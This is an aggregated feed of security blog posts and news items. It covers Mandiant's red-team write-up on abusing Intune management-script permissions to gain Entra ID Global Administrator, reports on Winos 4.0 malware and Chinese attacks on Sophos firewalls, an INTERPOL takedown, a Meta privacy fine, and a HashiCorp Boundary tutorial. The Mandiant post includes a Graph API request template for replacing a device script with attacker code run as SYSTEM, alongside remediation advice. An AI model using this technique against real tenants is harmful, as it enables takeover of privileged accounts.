Wednesday, November 6, 2024

(In)tuned to Takeovers: Abusing Intune Permissions for Lateral Movement and Privilege Escalation in Entra ID Native Environments

Written by: Thibault Van Geluwe de Berlaere, Karl Madden, Corné de Jong


The Mandiant Red Team recently supported a client to visualize the possible impact of a compromise by an advanced threat actor. During the assessment, Mandiant moved laterally from the customer’s on-premises environment to their Microsoft Entra ID tenant and obtained privileges to compromise existing Entra ID service principals installed in the tenant. 

In this blog post, we will show a novel way of how adversaries can move laterally and elevate privileges within Microsoft Entra ID when organizations use a popular security architecture involving Intune-managed Privileged Access Workstations (PAWs) by abusing Intune permissions (DeviceManagementConfiguration.ReadWrite.All) granted to Entra ID service principals. We also provide remediation steps and recommendations to prevent and detect this type of attack.

Pretext

The customer had a mature security architecture following Microsoft’s recommended Enterprise Access model, including:

  • An on-premises environment using Active Directory, following the Tiered Model

  • An Entra ID environment, synced to the on-premises environment using Microsoft Entra Connect Sync to synchronize on-premises identities and groups to Entra ID. This environment was administered using PAWs, which were not joined to the on-premises Active Directory environment, but instead were fully cloud-native and managed by Intune Mobile Device Management (MDM). IT administrators used a dedicated, cloud-native (non-synced) administrative account to log in to these systems. Entra ID role assignments (Global Administrator, Privileged Role Administrator, et cetera.) were exclusively assigned to these cloud-native administrative accounts.

The separation of administrative accounts, devices and privileges between the on-premises environment and the Entra ID environment provided a strong security boundary:

  1. Using separate, cloud-native identities for Entra ID privileged roles ensures a compromise of the on-premises Active Directory cannot be used to compromise the Entra ID environment. This is a Microsoft best practice.

  2. Using separate physical workstations for administrative access to on-premises resources and cloud resources effectively creates an ‘air gap’ between the administration plane of the two environments. Air gaps are especially difficult for attackers to cross.

  3. The administrative accounts in Entra ID were assigned roles through Privileged Identity Management enforced by strong Conditional Access policies, requiring a managed, compliant device and multi-factor authentication. These are also Microsoft-recommended best practices.

Attack Path

As part of the assessment objectives, the Mandiant Red Team was tasked with obtaining Global Administrator privileges in the Entra ID tenant. Through various techniques out of scope for this blog post, Mandiant obtained privileges in the Entra ID tenant to add credentials to Entra ID service principals (microsoft.directory/servicePrincipals/credentials/update), allowing the Red Team to compromise any preinstalled service principal.

A few publicly known techniques exist to abuse service principal privileges to obtain elevated permissions, most notably using the RoleManagement.ReadWrite.Directory, AppRoleAssignment.ReadWrite.All and Application.ReadWrite.All Microsoft Graph permissions. 

None of these permissions were in use in the customer’s environment though, forcing the Mandiant Red Team to rethink their strategy. 

Mandiant used the excellent ROADTools framework to gain further insight into the customer’s Entra ID environment, and discovered a service principal that was granted the DeviceManagementConfiguration.ReadWrite.All permission.

Service Principal was granted DeviceManagementConfiguration.ReadWrite.All permissions (screenshot from ROADTools)

Figure 1: Service principal was granted DeviceManagementConfiguration.ReadWrite.All permissions (screenshot from ROADTools)

This permission allows the service principal to "read and write Microsoft Intune device configuration and policies".

Intune’s device management scripts are custom PowerShell scripts that can run on clients running Windows 10 and later. The ability to run scripts on local devices gives administrators an alternative to configuring devices with settings that are not available under the configuration policies or in the apps part of Intune. Management scripts are executed when the device starts, with administrative privileges (NT AUTHORITY\SYSTEM).

Intune Management Scripts are executed at startup

Figure 2: Intune management scripts are executed at startup

The DeviceManagementConfiguration.ReadWrite.All permission is sufficient to list, read, create and update management scripts through the Microsoft Graph API.

Device Management Scripts can be modified with DeviceManagementConfiguration.ReadWrite.All

Figure 3: Device management scripts can be modified with DeviceManagementConfiguration.ReadWrite.All

The management script can easily be created or modified using the Microsoft Graph API. The following figure shows an example HTTP request to modify an existing script.

PATCH https://graph.microsoft.com/beta/deviceManagement/
deviceManagementScripts/<script id>

{
  "@odata.type": "#microsoft.graph.deviceManagementScript",
  "displayName": "<display name>",
  "description": "<description>", 
  "scriptContent": "<PowerShell script in base64 encoding>",
  "runAsAccount": "system",
  "enforceSignatureCheck": false,
  "fileName": "<filename>",
  "roleScopeTagIds": [
    "<existing role scope tags>"
  ],
  "runAs32Bit": false
}

The Graph API allows the caller to specify the PowerShell script content in Base64-encoded value, along with a display name, file name and description. The runAsAccount value can be configured as user or system, depending on the principal the script should be executed as. The roleScopeTagIds value references Scope Tags, an Intune mechanism that groups devices and users together. These can also be created and managed with the DeviceManagementConfiguration.ReadWrite.All permission. 

The DeviceManagementConfiguration.ReadWrite.All permission allowed Mandiant to move laterally to the PAWs used for Entra ID administration by modifying an existing device management script to execute a Mandiant-controlled PowerShell script. When the device reboots as part of the user’s daily work, the Intune management script is triggered and executes the malicious script. 

By launching a command-and-control implant, Mandiant could execute arbitrary commands on the PAWs. The Red Team waited for the victim to activate their privileged role through Azure Privileged Identity Management and impersonated the privileged account (e.g., through cookie or token theft), thereby obtaining privileged access to Entra ID. These steps allowed Mandiant to obtain Global Administrator privileges in Entra ID, completing the objective of this assessment.

Remediation and Recommendations

Mandiant recommends the following hardening recommendations to prevent the attack scenario:

  1. Review your organization’s security principals for the DeviceManagementConfiguration.ReadWrite.All permission: Organizations using Microsoft Intune for device management should treat the DeviceManagementConfiguration.ReadWrite.All permission as sensitive, as it gives the trustee a control relationship over the Intune-managed devices, and by extension, any identities associated with the device.

    Mandiant recommends organizations to regularly review the permissions granted to Azure service principals, paying special attention to the
    DeviceManagementConfiguration.ReadWrite.All permission, as well as other sensitive permissions (e.g., RoleManagement.ReadWrite.Directory, AppRoleAssignment.ReadWrite.All and Application.ReadWrite.All).

    Organizations that use Intune to manage PAWs should be especially careful delegating Intune privileges (either through DeviceManagementConfiguration.ReadWrite.All or through Entra roles such as Intune Role Administrator).

  2. Enable multiple admin approval for Intune: Intune supports using Access Policies to require a second administrator to approve any changes before a change is applied. This would prevent an attacker from creating or modifying management scripts with a single compromised account.
  3. Consider enabling Microsoft Graph API activity logs: Enablement of Graph API Activity logs can help in detection and response endeavors providing detailed information about Graph API HTTP requests made to Microsoft Graph resources.

  4. Utilize capabilities provided by Workload ID Premium licenses: When licensed for Workload-ID Premium Mandiant recommends leveraging these capabilities to:

    • Restrict privileged service principal usage from known trusted locations only. This limits the risk of unauthorized access and strengthens security by ensuring the use only from trusted locations. 
    • Enhance the security of service principals by enabling risk detections in Microsoft Identity Protection. This can proactively block access when suspicious activities or risk factors are identified.
  5. Proactively monitor service principal sign-ins: Proactively monitoring sign-ins from service principals can help detect anomalies and potential threats. Integrate this data into security operations to trigger alerts and enable rapid response to unauthorized access attempts.

Through numerous adversarial emulation engagements, Red Team Assessments, and Purple Team Assessments, Mandiant has gained an in-depth understanding of the unique paths attackers may take in compromising their target’s cloud estate. Review our Technical Assurance services and contact us for more information.



from Threat Intelligence https://ift.tt/FI0nVRX
via IFTTT

New Winos 4.0 Malware Infects Gamers Through Malicious Game Optimization Apps

Nov 06, 2024Ravie LakshmananMalware / Online Security

Cybersecurity researchers are warning that a command-and-control (C&C) framework called Winos is being distributed within gaming-related applications like installation tools, speed boosters, and optimization utilities.

"Winos 4.0 is an advanced malicious framework that offers comprehensive functionality, a stable architecture, and efficient control over numerous online endpoints to execute further actions," Fortinet FortiGuard Labs said in a report shared with The Hacker News. "Rebuilt from Gh0st RAT, it includes several modular components, each handling distinct functions."

Campaigns distributing Winos 4.0 were documented back in June by Trend Micro and the KnownSec 404 Team. The cybersecurity companies are tracking the activity cluster under the names Void Arachne and Silver Fox.

Attacks have been observed targeting Chinese-speaking users, leveraging black hat Search Engine Optimization (SEO) tactics, social media, and messaging platforms like Telegram to distribute the malware.

Fortinet's latest analysis shows that users who end up running the malicious game-related applications trigger a multi-stage infection process that begins with retrieving a fake BMP file from a remote server ("ad59t82g[.]com") that's then decoded into a dynamic-link library (DLL).

The DLL file takes care setting up the execution environment by downloading three files from the same server: t3d.tmp, t4d.tmp, and t5d.tmp, the first two of which are subsequently unpacked to obtain the next set of payloads comprising an executable ("u72kOdQ.exe") and three DLL files, including "libcef.dll."

"The DLL is named '学籍系统,' meaning 'Student Registration System,' suggesting that the threat actor may be targeting educational organizations," Fortinet said.

In the next step, the binary is employed to load "libcef.dll," which then extracts and executes the second-stage shellcode from t5d.tmp. The malware proceeds to establish contact with its command-and-control (C2) server ("202.79.173[.]4" using the TCP protocol and retrieve another DLL ("上线模块.dll").

The third-stage DLL, part of Winos 4.0, downloads encoded data from the C2 server, a fresh DLL module ("登录模块.dll") that's responsible for harvesting system information, copying clipboard content, gathering data from cryptocurrency wallet extensions like OKX Wallet and MetaMask, and facilitating backdoor functionality by awaiting further commands from the server.

Winos 4.0 also enables the delivery of additional plugins from the C2 server that allow it to capture screenshots and upload sensitive documents from the compromised system.

"Winos4.0 is a powerful framework, similar to Cobalt Strike and Sliver, that can support multiple functions and easily control compromised systems," Fortinet said. "Threat campaigns leverage game-related applications to lure a victim to download and execute the malware without caution and successfully deploy deep control of the system."

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.



from The Hacker News https://ift.tt/fHwotky
via IFTTT

Cloud News of the Month - September 2024

Brian Gracely and Brandon Whichard discuss the top stories in Cloud and AI from October 2024.

SHOW: 871

SHOW TRANSCRIPT:
The Cloudcast #871 Transcript

SHOW VIDEO: https://youtube.com/@TheCloudcastNET

CLOUD NEWS OF THE WEEK - http://bit.ly/cloudcast-cnotw

NEW TO CLOUD? CHECK OUT OUR OTHER PODCAST - "CLOUDCAST BASICS"

SHOW NOTES:

SEGMENTS COVERED IN THE SHOW:

  • Good Old Fashioned Cloud News
  • The AI Innovation Continues 

FEEDBACK?



from The Cloudcast (.NET) https://ift.tt/1cFyCvT
via IFTTT

INTERPOL Disrupts Over 22,000 Malicious Servers in Global Crackdown on Cybercrime

Nov 06, 2024Ravie LakshmananCyber Threat / Cybercrime

INTERPOL on Tuesday said it took down more than 22,000 malicious servers linked to various cyber threats as part of a global operation.

Dubbed Operation Synergia II, the coordinated effort ran from April 1 to August 31, 2024, targeting phishing, ransomware, and information stealer infrastructure.

"Of the approximately 30,000 suspicious IP addresses identified, 76 per cent were taken down and 59 servers were seized," INTERPOL said. "Additionally, 43 electronic devices, including laptops, mobile phones and hard disks were seized."

The actions also led to the arrest of 41 individuals, with 65 others still under investigation. Some of the other key outcomes across countries are listed below -

  • Takedown of more than 1,037 servers by Hong Kong police
  • Seizure of a server and the identification of 93 individuals with links to illegal cyber activities in Mongolia
  • Disruption of 291 servers in Macau
  • Identification of 11 individuals with links to malicious servers and the seizure of 11 electronic devices in Madagascar
  • Seizure of more than 80GB worth of data in Estonia

Group-IB, which was one of the private sector partners alongside Kaspersky, Team Cymru, and Trend Micro, said it identified over 2,500 IP addresses linked to 5,000 phishing websites, and more than 1,300 IP addresses tied to various malware activities spanning 84 countries.

David Monnier, chief evangelist at Team Cymru, said it contributed to the effort by "identifying and categorizing malicious infrastructure" following extensive analysis.

The first phase of Synergia took place between September and November 2023, leading to 31 arrests and the identification of 1,300 suspicious IP addresses and URLs used for phishing, banking malware, and ransomware attacks.

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.



from The Hacker News https://ift.tt/cd3fBjr
via IFTTT

CrowdStrike to Acquire Adaptive Shield to Deliver Integrated SaaS Security Posture Management



from Blog https://ift.tt/acNmu1d
via IFTTT

South Korea Fines Meta $15.67M for Illegally Sharing Sensitive User Data with Advertisers

Nov 06, 2024Ravie LakshmananData Privacy / Tech Regulation

Meta has been fined 21.62 billion won ($15.67 million) by South Korea's data privacy watchdog for illegally collecting sensitive personal information from Facebook users, including data about their political views and sexual orientation, and sharing it with advertisers without their consent.

The country's Personal Information Protection Commission (PIPC) said Meta gathered information such as religious affiliations, political views, and same-sex marital status of about 980,000 domestic Facebook users and shared it with 4,000 advertisers.

"Specifically, it was found that behavioral information, such as the pages that users 'liked' on Facebook and the ads they clicked on, was analyzed to create and operate advertising topics related to sensitive information," the PIPC said in a press statement.

These topics categorized users as following a certain religion, identifying them as a gay or transgender person, or being a defector from North Korea, it added.

The agency accused Meta of processing such sensitive information without a proper legal basis, and that it did not seek users' consent before doing so.

It also called out the tech giant for failing to enact safety measures to secure inactive accounts, thereby allowing malicious actors to request password resets for those accounts by submitting fake identification information. Meta approved such requests without sufficient verification of the fake IDs, resulting in the leak of the personal information of 10 South Korean users.

"Going forward, the Personal Information Protection Commission will continue to monitor whether Meta is complying with its corrective order, and will do its best to protect the personal information of our citizens by applying the protection law without discrimination to global companies that provide services to domestic users," the regulator said.

Meta, in a statement shared with Associated Press, said it will "carefully review" the commission's decision.

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.



from The Hacker News https://ift.tt/SZBqb6g
via IFTTT

Tuesday, November 5, 2024

FBI Seeks Public Help to Identify Chinese Hackers Behind Global Cyber Intrusions

The U.S. Federal Bureau of Investigation (FBI) has sought assistance from the public in connection with an investigation involving the breach of edge devices and computer networks belonging to companies and government entities.

"An Advanced Persistent Threat group allegedly created and deployed malware (CVE-2020-12271) as part of a widespread series of indiscriminate computer intrusions designed to exfiltrate sensitive data from firewalls worldwide," the agency said.

"The FBI is seeking information regarding the identities of the individuals responsible for these cyber intrusions."

The development comes in the aftermath of a series of reports published by cybersecurity vendor Sophos chronicling a set of campaigns between 2018 and 2023 that exploited its edge infrastructure appliances to deploy custom malware or repurpose them as proxies to evade detection.

The malicious activity, codenamed Pacific Rim and designed to conduct surveillance, sabotage, and cyber espionage, has been attributed to multiple Chinese state-sponsored groups, including APT31, APT41, and Volt Typhoon. The earliest attack dates back to late 2018, when a cyber-attack was aimed at Sophos' Indian subsidiary Cyberoam.

"The adversaries have targeted both small and large critical infrastructure and government facilities, primarily in South and Southeast Asia, including nuclear energy suppliers, a national capital's airport, a military hospital, state security apparatus, and central government ministries," Sophos said.

Some of the subsequent mass attacks have been identified as leveraging multiple then zero-day vulnerabilities in Sophos firewalls – CVE-2020-12271, CVE-2020-15069, CVE-2020-29574, CVE-2022-1040, and CVE-2022-3236 – to compromise the devices and deliver payloads both to the device firmware and those located within the organization's LAN network.

"From 2021 onwards the adversaries appeared to shift focus from widespread indiscriminate attacks to highly targeted, 'hands-on-keyboard' narrow-focus attacks against specific entities: government agencies, critical infrastructure, research and development organizations, healthcare providers, retail, finance, military, and public-sector organizations primarily in the Asia-Pacific region," it said.

Beginning mid-2022, the attackers are said to have focused their efforts on gaining deeper access to specific organizations, evading detection, and gathering more information by manually executing commands and deploying malware like Asnarök, Gh0st RAT, and Pygmy Goat, a sophisticated backdoor cable of providing persistent remote access to Sophos XG Firewalls and likely other Linux devices.

"While not containing any novel techniques, Pygmy Goat is quite sophisticated in how it enables the actor to interact with it on demand, while blending in with normal network traffic," the U.K. National Cyber Security Centre (NCSC) said.

"The code itself is clean, with short, well-structured functions aiding future extensibility, and errors are checked throughout, suggesting it was written by a competent developer or developers."

The backdoor, a novel rootkit that takes the form of a shared object ("libsophos.so"), has been found to be delivered following the exploitation of CVE-2022-1040. The use of the rootkit was observed between March and April 2022 on a government device and a technology partner, and again in May 2022 on a machine in a military hospital based in Asia.

It has been attributed to be the handiwork of a Chinese threat actor internally tracked by Sophos as Tstark, which shares links to the University of Electronic Science and Technology of China (UESTC) in Chengdu.

It comes with the "ability to listen for and respond to specially crafted ICMP packets, which, if received by an infected device, would open a SOCKS proxy or a reverse shell back-connection to an IP address of the attacker's choosing."

Sophos said it countered the campaigns in its early stage by deploying a bespoke kernel implant of its own on devices owned by Chinese threat actors to carry out malicious exploit research, including machines owned by Sichuan Silence Information Technology's Double Helix Research Institute, thereby gaining visibility into a "previously unknown and stealthy remote code execution exploit" in July 2020.

A follow-up analysis in August 2020 led to the discovery of a lower-severity post-authentication remote code execution vulnerability in an operating system component, the company added.

Furthermore, the Thoma Bravo-owned company said it has observed a pattern of receiving "simultaneously highly helpful yet suspicious" bug bounty reports at least twice (CVE-2020-12271 and CVE-2022-1040) from what it suspects are individuals with ties to Chengdu-based research institutions prior to them being used maliciously.

The findings are significant, not least because they show that active vulnerability research and development activity is being conducted in the Sichuan region, and then passed on to various Chinese state-sponsored frontline groups with differing objectives, capabilities, and post-exploitation techniques.

"With Pacific Rim we observed [...] an assembly line of zero-day exploit development associated with educational institutions in Sichuan, China," Chester Wisniewski said. "These exploits appear to have been shared with state-sponsored attackers, which makes sense for a nation-state that mandates such sharing through their vulnerability-disclosure laws."

The increased targeting of edge network devices also coincides with a threat assessment from the Canadian Centre for Cyber Security (Cyber Centre) that revealed at least 20 Canadian government networks have been compromised by Chinese state-sponsored hacking crews over the past four years to advance its strategic, economic, and diplomatic interests.

It also accused Chinese threat actors of targeting its private sector to gain a competitive advantage by collecting confidential and proprietary information, alongside supporting "transnational repression" missions that seek to target Uyghurs, Tibetans, pro-democracy activists, and supporters of Taiwanese independence.

Chinese cyber threat actors "have compromised and maintained access to multiple government networks over the past five years, collecting communications and other valuable information," it said. "The threat actors sent email messages with tracking images to recipients to conduct network reconnaissance."

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.



from The Hacker News https://ift.tt/nBjcgZ2
via IFTTT

Secure remote access to private HTTPS targets with HashiCorp Boundary

In my role as a solutions engineer, I’ve talked to many customers and practitioners about HashiCorp Boundary over the past year or so, and one of the main questions that always gets asked is: “How does Boundary secure remote access to HTTPS targets?”

Before Boundary 0.18, Boundary would use the 127.0.0.1 address and port as its proxy address to initiate a session. When Boundary opens a listening socket for connection proxying, most applications will use normal TLS verification logic, which requires using the hostname or IP address to be present on the server’s certificate, in order to establish a connection. Most certificates do not include an IP Subject Alternative Name (SAN) of 127.0.0.1 for legitimate security reasons including local trust issues, cross-application risks and certificate management. Furthermore, most customers are unwilling or unable to provision updated certificates that contain that IP SAN. Therefore, it was usually not possible to access HTTPS targets with Boundary.

Transparent sessions greatly simplify this workflow. In this blog, I’ll outline some background on Boundary vs. VPNs, Boundary aliases, and the new transparent sessions feature. To conclude, I’ll show you a working example of a transparent sessions workflow for setting up secure remote access to private HTTPS targets. This example is not intended to serve as a best practice or HashiCorp-recommended practice, but more so to provide an example of what can be achieved and to allow practitioners to take a working example to explore and build upon.

Boundary vs. VPN

Boundary often gets compared to a traditional VPN solution, however, unlike a VPN, Boundary does not bridge the user onto the entire network. Instead, Boundary leverages your Identity Providers (IdP) to enable more granular control about what individuals, or groups of individuals, have access to, in relation to resources organizations have within their network. This helps mitigate against lateral access that often is a result of using a traditional VPN solution.

In one of my previous blogs, I discussed and demonstrated the implementation of a multi-hop deployment with Boundary. This allowed users to securely access resources sitting in an RFC1918 address space from the comfort of their own home, without relying on the need for a VPN solution. However, the multi-hop deployment specifically addressed accessing targets such as SSH, RDP, databases, Kubernetes, and others. Boundary didn't have an adequate solution for HTTPS targets.

Boundary aliases

In the Boundary 0.16 release, the concept of aliases was introduced. Aliases are a hostname-style string that you can attribute to a target, which makes it easier to remember and therefore more user-friendly when accessing targets.

Before aliases, if you were using the CLI and wanted to SSH to a specific server in your environment (for example, a web-front-end server) you would either had to have the following:

  • The target_id written down or stored somewhere convenient and then issue the boundary connect ssh -target-id tssh_hjuozD0EmM command (if using application credential injection).
  • The name of the target along with the associated scope ID and then issue the boundary connect ssh -target-name webfrontend -target-scope-id p_XUW5XcYAKe.

If you were using the Boundary Desktop client, and Boundary was managing hundreds or thousands of resources, you would have to know something about that resource, such as name or ID, to save you trawling through numerous pages to find the target in question.

With aliases, you can now give a DNS-like name to the target. For our example above, you could attribute the name prod.webfrontend1, which would replace the need to use the target ID tssh_hjuozD0EmM as the parameter required to connect to a specific target.

Aliases work hand-in-hand with Boundary’s transparent sessions. Transparent sessions enable Boundary to shift from an active to a passive connection process. Instead of users interacting with the Boundary CLI or Desktop client to initiate a session, Boundary will automatically initiate sessions for them anytime they connect using their existing tools (SSH client terminal, putty, RDP client, web browser, etc). Boundary operates in the background, intercepting DNS calls and routing traffic through a session if the user is authenticated and authorized.

With transparent sessions, you no longer need to issue any specific Boundary commands and instead can simply issue the command ssh prod.webfrontend1 to SSH to our target. This greatly improves user experience as users no longer have to remember vendor-specific commands to achieve a simple SSH connection, in this example. This is all possible because of transparent sessions, which allows a simplification of connectivity without relinquishing any of the capabilities of Boundary.

Transparent sessions explained

With transparent sessions, users do not have to directly interact with Boundary itself, i.e. issuing specific Boundary commands to connect via SSH, RDP, HTTPS etc. to targets. However, the important benefit of connecting securely while imposing granular control about what individual users and/or groups can connect to, still remains.

The Boundary Client Agent gets installed onto your machine when you install the new Boundary installer. This agent acts as your system’s DNS daemon. When a user has successfully authenticated into Boundary via the CLI or Desktop Client, the Boundary Client Agent becomes the primary DNS resolver on the machine. The Client Agent will intercept all DNS requests made on the system.

If a destination DNS request matches a Boundary alias that the user is authorized to use, Boundary automatically generates a session and transparently proxies the connection on behalf of the user. In the event that there is not a matching Boundary alias to a destination DNS request, the Client Agent will forward requests to the previously set DNS resolver(s).

The diagram below depicts the example discussed above:

Transparent

Here’s what’s happening in each step:

  1. Boundary admin / SRE creates the new alias prod.webfrontend1 and assigns it to the desired target.
  2. After ~2 minutes, the Client Agent alias cache will pull the information about this assignment down to store locally.
  3. The end user then issues the traditional SSH command to prod.webfrontend1. The alias is cached, which helps reduce the load on the Boundary controllers because they are not serving as many requests, and connectivity is now established.

If the Boundary admin / SRE removes the alias, after ~2 minutes if the user tries to SSH again to prod.webfrontend1, it will forward requests to the previously set DNS resolver(s).

Boundary Client Agent

With transparent sessions, a new package is included in the new Boundary installer. This will install, and/or upgrade any existing Boundary components you already have on your system.

Installing

After installation, the Client Agent becomes the primary DNS resolver on the machine.

Leveraging custom DNS responses

Before transparent sessions, the proxy address was a combination of the localhost address plus the port number. With transparent sessions, the IPv4 address used comes from the RFC6598 Carrier-grade NAT space (CGNAT) (100.64.0.0 to 100.127.255.255) by default.

As an example, if you have a target alias set to internal.hashicorp.com, when you attempt to make a connection to that address, the DNS request is intercepted by the Client Agent and directed to a local IP address, from which the connection is proxied over a normal Boundary session to the real host. The host provides its certificate, and as long as the target alias matches one of the SANs in the certificate, the secure connection will be accepted and established. This is what makes HTTPS targets possible with transparent sessions.

To verify that the Client Agent is the primary DNS server, issue the following command for Mac: % scutil --dns, or % ipconfig /all for Windows.

On a Mac, the output should look similar to the example below:

DNS configuration (for scoped queries)

resolver #1
  search domain[0] : Home
  nameserver[0] : 100.118.180.7
  nameserver[1] : fc00:557b::f451:1d6e
  if_index : 15 (en0)
  flags    : Scoped, Request A records, Request AAAA records
  reach    : 0x00030002 (Reachable,Local Address,Directly Reachable Address)

You can see that the nameserver[0] and nameserver[1] addresses are set by the Client Agent, to support both IPv4 and IPv6. There is no IPv6 range for CGNAT, so the IPv6 is a range from the unique local address (ULA) range.

If you configured an alias for www.hashicorp.com and then ran an nslookup www.hashicorp.com on Mac, or resolve-dnsname www.hashicorp.com on Windows, you would see the IPs of the DNS server used, as well as the DNS request being made and the response.

#DNS response
;; Truncated, retrying in TCP mode.
Server:         100.118.180.7
Address:        100.118.180.7#53

Name:   www.hashicorp.com
Address: 100.119.113.220

Boundary Client Agent operations

With the introduction of the Client Agent, comes some commands to manage the operation of it.

Status

The status command provides the user with the status of the Client Agent. As shown in the output below, you are shown the address of the Boundary cluster, the status of the Client Agent, and some information pertaining to the authorization token and version. If there are any errors in relation to the operation of the Client Agent, these will be displayed under the ‘Recent errors:’ section. The default auth token expiry is 7 days and is configurable.

% boundary client-agent status                      

Status:
  Address:                 https://12345678-9012-3456-a8a7-6d8c8e1bc44c.boundary.hashicorp.cloud
  Auth Token Expiration:   148h18m48s
  Auth Token Id:           at_fYfwLL7jpB
  Status:                  running
  Version:                 0.1.0
  Recent errors:

Pause

The pause command stops the Client Agent currently running. After you initiate the command, as shown in the output below, you will receive confirmation that the Client Agent has successfully paused.

% boundary client-agent pause 
The client agent has been successfully paused.

If you were to check the status of your DNS resolvers again, you will see that it has gone back to one of your previously set resolvers.

DNS configuration (for scoped queries)

resolver #1
  search domain[0] : Home
  nameserver[0] : 192.168.0.1
  nameserver[1] : fd69:2e4c:8e52:0:3e45:7aff:fe52:9620
  if_index : 15 (en0)
  flags    : Scoped, Request A records, Request AAAA records
  reach    : 0x00020002 (Reachable,Directly Reachable Address)

Resume

The resume command restarts the Client Agent and it will once again become the primary DNS resolver.

% boundary client-agent resume
The client agent has been successfully resumed.

Example deployment: Access to private HTTPS targets with transparent sessions

To illustrate and demonstrate how organizations can leverage Boundary with transparent sessions, I have built the topology outlined below. There are no VPN connections in this workflow, but by leveraging HCP Boundary and multi-hop workers, you can facilitate connectivity into private networks (i.e. your organization’s network) securely, while ensuring organizations do not have to create any additional inbound rules in their firewalls / security rule groups.

Everything has been automated using Terraform, and the code can be found here.

Transparent

I have my domain transparentsessions.com and have created an A-record in Route 53 as test.transparentsessions.com. I have both a public and private VPC with a self-managed Boundary worker in each.

You can see in the private VPC that the address is from the RFC1918 Class C 192.168.0.0 range and cannot be accessed directly from outside of that network. The EC2 instance that gets deployed in the private VPC is configured to install an Apache web server, create a basic HTML web page, and utilize the Vault PKI secrets engine from HCP Vault Dedicated to fetch the generated, requisite certificates that will ensure you can access the site securely using HTTPS. We will configure our machine to trust this CA in a later step.

At the bottom of the diagram you have two personas: an authorized user and an unauthorized user. This is a rudimentary example, but I wanted to emphasize that you will need to control/restrict access to HTTPS endpoints/resources within your organization based on different personas.

Assigning an alias

As previously mentioned, you have to assign the Boundary alias to the target in question. In my example, the target is an instance of Ubuntu Linux residing in the private network within AWS. In the Terraform config you have two resources that constitute the target and the alias.

The boundary_target resource is your target within Boundary. The configuration specifies the type to be tcp, allocates the ingress and egress workers to use, sets the project scope for the target to reside in, and sets the default port to be 443 (HTTPS).

resource "boundary_target" "ubuntu_linux_private" {
 type                     = "tcp"
 name                     = "ubuntu-private-linux"
 description              = "Ubuntu Linux Private Target"
 egress_worker_filter     = " \"sm-egress-downstream-worker1\" in \"/tags/type\" "
 ingress_worker_filter    = " \"sm-ingress-upstream-worker1\" in \"/tags/type\" "
 scope_id                 = boundary_scope.project.id
 session_connection_limit = -1
 default_port             = 443
 host_source_ids = [
   boundary_host_set_static.ubuntu_linux_machines.id
 ]
}

The second resource is the boundary_alias_target. Looking at the configuration below, I have specified the scope (at the time of writing, aliases are always defined at the Global scope level), the value of the alias, which is set to test.transparentsessions.com, and the destination_id, which is the target that you associate the alias with. (in this example, it’s the Ubuntu Linux resource outlined above)

resource "boundary_alias_target" "ts_alias_target" {
 name                      = "transparent_sessions_alias_target"
 description               = "Alias to target using test.transparentsessions.com"
 scope_id                  = "global"
 value                     = "test.transparentsessions.com"
 destination_id            = boundary_target.ubuntu_linux_private.id
 authorize_session_host_id = boundary_host_static.ubuntu_private_linux.id
}

Users

To ensure clarity, I only have two personas created, as previously discussed: authorized user and unauthorized user.

For the unauthorized user, I created a user via Terraform.

resource "boundary_account_password" "unauthorized_user" {
 auth_method_id = boundary_auth_method.password.id
 login_name     = "unauthorized"
 password       = "unauthorized"
}

After that, I needed to assign minimal permissions to that user.

resource "boundary_role" "unauthorized" {
 description = "read-auth-token"
 grant_strings = [
   "type=auth-token;ids=*;actions=read:self",
   "type=user;actions=list-resolvable-aliases;ids=*",
 ]
 name          = "read-auth-token"
 principal_ids = [boundary_user.unauthorized_user.id]
 scope_id      = "global"
}

In the above resource, you can see two grant strings that have been added:

  1. "type=auth-token;ids=*;actions=read:self" This ensures that the user can authenticate to the Client Agent.
  2. "type=user;actions=list-resolvable-aliases;ids=*"This ensures that the user can read the aliases that are part of the overall transparent sessions workflow.

No other permissions are granted to this user. Of course, within your organization, users and/or groups will have different grant strings attributed based on who they are and their role(s).

For the authorized user, I have given read access in the global scope and full access in the org and project scopes:

resource "boundary_role" "authorized_global_role" {
 name          = "authorized_global_role"
 description   = "Authorized Global Role"
 scope_id      = "global"
 principal_ids = [boundary_user.authorized_user.id]
 grant_strings = [
   "ids=*;type=*;actions=read",
   "type=auth-token;ids=*;actions=read:self",
   "type=user;actions=list-resolvable-aliases;ids=*",
 ]
}


resource "boundary_role" "authorized_org_role" {
 name          = "authorized_org_role"
 description   = "Authorized Org Role"
 scope_id      = boundary_scope.org.id
 principal_ids = [boundary_user.authorized_user.id]
 grant_strings = ["ids=*;type=*;actions=*"]
} 


resource "boundary_role" "authorized_project_role" {
 name          = "authorized_project_role"
 description   = "Authorized Project Role"
 scope_id      = boundary_scope.project.id
 principal_ids = [boundary_user.authorized_user.id]
 grant_strings = ["ids=*;type=*;actions=*", ]
}

Add trusted cert to the keychain

After the Terraform deployment has finished, the pki_root.crt will be created in the directory. For this demo, you need to add this to your keychain on the machine in order to trust the certificate authority (CA) that has generated it. In this example, the CA is Vault.

sudo security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain ./pki_root.crt

Testing out the scenarios

1. Unauthenticated user

For the first scenario, I have logged out of Boundary and left the Client Agent running as displayed by the CLI output shown in the screenshot below. Trying to access https://test.transparentsessions.com fails as expected. Without Boundary and transparent sessions, I cannot access the website that sits in the 192.168.x.x address range within my AWS VPC in EU-West-2.

Unauthenticated

2. Unauthorized user (authenticated but unauthorized)

For the second scenario I have authenticated into Boundary as the unauthorized user. you can see in the Desktop client that there are no targets available to connect to, and as expected, you cannot access the website.

Unauthorized

3. Authorized user (authenticated and authorized)

The final scenario is where an authenticated and authorized user tries to access the HTTPS target. You can see from the boundary-client-agent.log that you have successfully authenticated and a session was created on my behalf when I connected using the alias name test.transparentsessions.com. The Boundary Client Agent has found a matching alias that is attributed to a target and starts the proxy.

Boundary

I have logged into the Desktop client as the authorized user, as shown in the top right corner of the screenshot, and I have the target available. This is further confirmed as you can see the alias details as our URL.

Authorized

Now in a browser you can successfully reach the HTTPS target as you can see the web page. To hopefully add further credence, you can also see my AWS console that has the website-ec2 instance. If you look along that row it only has an RFC1918 192.168.0.0 address assigned and no Public IPv4 address, so I have successfully reached this HTTPS target while being on my own home network without the need for a VPN connection.

Successfully

Rethinking VPNs: How Boundary as a modern PAM takes the lead

